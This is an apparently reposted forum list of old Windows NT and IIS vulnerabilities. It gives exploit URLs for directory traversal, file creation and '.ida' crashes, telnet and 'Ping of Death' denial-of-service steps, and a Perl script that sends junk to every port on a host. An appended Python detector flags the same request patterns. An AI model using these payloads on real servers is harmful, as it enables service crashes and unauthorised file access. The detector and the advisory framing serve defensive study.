NT vulnerabilities and descriptions (English)

Posted 2011-1-13 17:12:25
Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):

# begin poke code
use Socket;
use FileHandle;
require "chat2.pl";   # Perl 4-era chat library that the script depends on

# target host name comes from the command line: perl poke servername
$systemname = shift @ARGV or die "usage: perl poke servername\n";

$verbose = 1;     # tell me what you're hitting
$knownports = 1;  # don't hit known problem ports (53, 135, 1031)

# the original read "$port = $0" (the script name); start at port 1 instead
for ($port = 1; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;   # nothing listening on this port
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
# end poke code

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr>, will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge of how the web site is organized and the directory structure of the server.
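As an added defender-side example (not part of the original post), the following Python classifies web-server request lines against the URL patterns described above: the '..\..' traversal, the '>PATH\target.bat' redirection, the '%0A%0D' script-name injection, and the '.ida'/'.idq' requests. The sample request lines and the long-URL threshold are constructed here for illustration.

```python
from urllib.parse import unquote

# Constructed sample request lines, one per pattern described in the post,
# plus a benign request. They are made up here, not taken from a real log.
SAMPLE_REQUESTS = [
    "GET /index.htm HTTP/1.0",
    "GET /..\\.. HTTP/1.0",
    "GET ../.. HTTP/1.0",
    "GET /scripts..\\..\\scriptname HTTP/1.0",
    "GET /scripts/exploit.bat>C:\\target.bat HTTP/1.0",
    "GET /scripts/script_name%0A%0D>C:\\target.bat HTTP/1.0",
    "GET /" + "." * 2000 + "ida HTTP/1.0",
    "GET /anything.idq HTTP/1.0",
]


def classify_request(request_line, long_url_threshold=1024):
    """Return sorted finding tags for one HTTP request line (empty if clean).

    long_url_threshold is an assumed cut-off for the oversized .ida request;
    the post reports roughly 25 KB of dots, so 1024 is deliberately strict.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return ["malformed"]
    raw_path = parts[1]
    path = unquote(raw_path)            # decode %0A%0D etc. before matching
    findings = set()
    if "..\\" in path or "../" in path:
        findings.add("traversal")       # '..\..' browsing outside the web root
    if ">" in path:
        findings.add("shell_redirect")  # '>PATH\target.bat' file creation
    if "\r" in path or "\n" in path:
        findings.add("crlf_injection")  # %0A%0D smuggled into the script name
    name = path.split("?", 1)[0].lower()
    if name.endswith((".ida", ".idq")):
        findings.add("idq_path_disclosure")   # error text leaks physical path
        if len(raw_path) > long_url_threshold:
            findings.add("ida_long_url_dos")  # the '[25kb of .]ida' crash
    return sorted(findings)


def scan_requests(lines, **kwargs):
    """Map each flagged request line to its findings; clean lines are omitted."""
    hits = {}
    for line in lines:
        findings = classify_request(line, **kwargs)
        if findings:
            hits[line] = findings
    return hits


if __name__ == "__main__":
    for line, findings in scan_requests(SAMPLE_REQUESTS).items():
        print(f"{', '.join(findings):40} {line[:60]}")
```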